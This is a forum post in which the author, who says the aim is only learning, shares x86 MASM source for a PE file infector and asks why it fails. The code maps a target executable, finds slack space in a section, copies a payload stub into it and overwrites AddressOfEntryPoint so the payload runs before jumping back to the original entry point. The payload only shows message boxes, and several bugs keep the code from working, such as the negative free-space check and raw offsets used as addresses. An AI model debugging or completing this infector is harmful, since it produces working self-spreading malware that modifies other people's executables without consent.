add new code in the end of section - Programmers Heaven


add new code in the end of section

First, one important point: I don't want to write a powerful virus. I want to understand how viruses work and how antivirus programs work.

I want to add code at the end of a section. I wrote the file that I want to modify.
Here is the code of the victim file:
[code]
; Test target: shows one message box that uses the same string as text and
; caption, then ends the process with exit code 0.
.data

DB_strOutput DB "Dosen't infected",0

.code
_start:
; MessageBox(hWnd = 0, text, caption, MB_OK); arguments pushed right to left
push MB_OK
push offset DB_strOutput
push offset DB_strOutput
push 0
call MessageBox
; ExitProcess(0)
invoke ExitProcess, 0
end _start[/code]

I wrote this code to modify the victim file:
[code].586p
.model flat,stdcall
option casemap:none

include masm32includewindows.inc
include masm32includeuser32.inc
includelib masm32libuser32.lib

include masm32includekernel32.inc
includelib masm32libkernel32.lib


.data

; Working storage for _start. Everything except the two strings and
; DD_sizeOfCode is uninitialised (?) until _start writes it.

; Path of the executable that _start opens with read/write access
DB_strAddress DB "C:/firstMalware_victim.exe",0
DD_hFile_Mapping DD ?; CreateFileMapping result; later overwritten with the MapViewOfFile result
DD_adressOfMappingFile DD ?; MapViewOfFile result (base address of the mapped view)
DD_hFile DD ?; handle returned by CreateFileA
DW_numberOfSections DW ?; FileHeader.NumberOfSections read from the mapped file
DD_addressOfIMAGE_DOS_HEADER DD ?; address of the mapped IMAGE_DOS_HEADER
DD_addressOfIMAGE_FILE_HEADER DD ?; read once in _start, but never written by the visible code
DD_addressOfIMAGE_OPTIONAL_HEADER DD ?; address of the mapped OptionalHeader
DD_addressOfIMAGE_NT_HEADERS DD ?; DOS header address + e_lfanew
DD_addressOfDataDirectory DD ?; address of OptionalHeader.DataDirectory
DD_addressOfIMAGE_SECTION_HEADER DD ?; NT headers address + sizeof IMAGE_NT_HEADERS
DB_string_forInfect DB "LOL",0; 4 bytes including the terminating zero
DD_sizeOfCode DD 0;size of code which we want to write in victim file (not referenced by the visible code)
DD_addressToJump DD ?; receives the target's original AddressOfEntryPoint
DD_addressBeginOfNewCode DD ?;address where we implant new code: PointerToRawData + SizeOfRawData of the chosen section, then + 4
DD_addressOfNewString DD ?; receives offset DB_string_forInfect
.code
; _start: opens the file named by DB_strAddress with read/write access, maps it,
; walks its PE headers to the section table and looks for a section whose
; (VirtualSize - SizeOfRawData) is at least the size held in EBX. On a match it
; runs two rep movsb copies and stores a new value in
; OptionalHeader.AddressOfEntryPoint. Every path ends in ExitProcess(0); the view
; and the two handles are not released explicitly before that.
; NOTE(review): what a defender can observe from this routine is a write-access
; open of an .exe, a PAGE_READWRITE file mapping of it, and a store to
; AddressOfEntryPoint; file-integrity or hash/signature checks on the target
; would register any resulting change.
_start:

;open file
; CreateFileA arguments, pushed last-to-first (stdcall)
push 0;hTemplateFile
push FILE_ATTRIBUTE_NORMAL;The file does not have other attributes set. This attribute is valid only if used alone.
push OPEN_EXISTING;the call fails if the file does not exist
push 0;lpSecurityAttributes
push FILE_SHARE_DELETE;share mode
push GENERIC_WRITE or GENERIC_READ;desired access
push offset DB_strAddress;lpFileName
call CreateFileA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

cmp EAX, -1;ERROR? (-1 = INVALID_HANDLE_VALUE)
jz EXIT

mov DD_hFile, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;call CreateFileMapping
push 0;lpName
push 0;dwMaximumSizeLow
push 0;dwMaximumSizeHigh
push PAGE_READWRITE;protection
push 0;lpAttributes
push DD_hFile
call CreateFileMapping
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov DD_hFile_Mapping, EAX;result is stored without a check
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;call MapViewOfFile
;Maps a view of a file mapping into the address space of a calling process.
push 0;dwNumberOfBytesToMap
push 0;dwFileOffsetLow
push 0;dwFileOffsetHigh
push FILE_MAP_READ or FILE_MAP_WRITE
push DD_hFile_Mapping
call MapViewOfFile;Maps a view of a file mapping into the address space of a calling process.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

mov DD_hFile_Mapping, EAX;overwrites the mapping handle with the view address

cmp EAX, -1;ERROR? (the result is compared with -1 here)
jz EXIT


mov DD_adressOfMappingFile, EAX;load address of loaded file
mov EDI, DD_hFile_Mapping;set address of first byte of mapping-file
assume EDI:ptr IMAGE_DOS_HEADER;EDI points to IMAGE_DOS_HEADER
mov DD_addressOfIMAGE_DOS_HEADER, EDI

add EDI, [EDI].e_lfanew;EDI = DOS header address + e_lfanew, value taken from the file as-is
mov DD_addressOfIMAGE_NT_HEADERS, EDI
assume EDI:ptr IMAGE_NT_HEADERS
lea EAX, [EDI].FileHeader;this EAX value is not stored; the next instruction overwrites AX
mov AX, [EDI].FileHeader.NumberOfSections
mov DW_numberOfSections, AX
mov EAX, DD_addressOfIMAGE_FILE_HEADER;loads a variable no visible line has written; EAX is replaced below
lea EDI, [EDI].OptionalHeader
mov DD_addressOfIMAGE_OPTIONAL_HEADER, EDI
assume EDI:ptr IMAGE_OPTIONAL_HEADER
lea EAX, [EDI].DataDirectory
mov DD_addressOfDataDirectory, EAX
mov EAX, DD_addressOfIMAGE_NT_HEADERS
add EAX, sizeof IMAGE_NT_HEADERS
mov DD_addressOfIMAGE_SECTION_HEADER,EAX ;address of Sections Table
assume EAX:ptr IMAGE_SECTION_HEADER;EAX walks the section headers from here on
;get to know size of our code which we want to implant
mov EBX, offset Label_forInfect_start
sub EBX, Label_forInfect_end
push EBX;saved on the stack; popped again inside the .if body
add EBX,4;size of our code with a string
;check sections for a free size
xor ECX, ECX;CX is the section counter for the loop
.while CX < DW_numberOfSections
mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EDX = VirtualSize - SizeOfRawData, which the author treats as the free size in the section
.if EDX >= EBX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData;ECX is reused here; the body leaves the loop with the jmp below
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ECX, 4;byte count for the string copy ("LOL" plus terminator)
mov ESI, offset DB_string_forInfect
mov DD_addressOfNewString, ESI
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy string to file
add DD_addressBeginOfNewCode, 4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;copy code
;copy AddressOfEntryPoint
mov ECX, DD_addressOfIMAGE_OPTIONAL_HEADER
assume ECX:ptr IMAGE_OPTIONAL_HEADER
mov ESI, [ECX].AddressOfEntryPoint
mov DD_addressToJump, ESI;copy AddressOfEntryPoint
mov [ECX].AddressOfEntryPoint, offset Label_forInfect_start;change AddressOfEntryPoint
pop EBX;restores the size pushed before the loop
mov ECX, EBX;number of bytes which we should copy
mov ESI, Label_forInfect_start
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy code
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

jmp LabelAfterWritingToTheSections;stop after the first section that passes the test
.endif
add EAX, sizeof IMAGE_SECTION_HEADER;advance to the next section header
inc CX
.endw
LabelAfterWritingToTheSections:

EXIT:
invoke ExitProcess,0

; Byte range bracketed by Label_forInfect_start / Label_forInfect_end, placed after
; the ExitProcess call of _start. It makes two MessageBox calls with
; DB_string_forInfect and then jumps to the address stored in DD_addressToJump.
Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1;hWnd = 0, text, caption, uType = 1
; second call built by hand: values are pushed in the order 0, string, string, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump;indirect jump through the dword that _start fills with the saved AddressOfEntryPoint
Label_forInfect_end:
end _start[/code]

I want to add this code at the beginning of the victim's file:
[code]Label_forInfect_start:
; Same sequence as in the full listing: two MessageBox calls with
; DB_string_forInfect, then a jump to the address stored in DD_addressToJump.
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1;hWnd = 0, text, caption, uType = 1
; second call built by hand: values are pushed in the order 0, string, string, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump;indirect jump through the dword DD_addressToJump
Label_forInfect_end:[/code]

But I've got one problem. My program doesn't work.
I opened it in the debugger and found some strange things:
1. There are only 3 sections in the victim's file
2. This condition is never met:
[code].if EDX >= EBX[/code]
Maybe I wrote something wrong before this.
I assume that I worked incorrectly with the fields of IMAGE_SECTION_HEADER.
[code]mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section[/code]
I saw in the debugger that EDX contains a negative value:
FFFFFF92
And the last question: have I done something wrong here:
[code];get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX[/code]

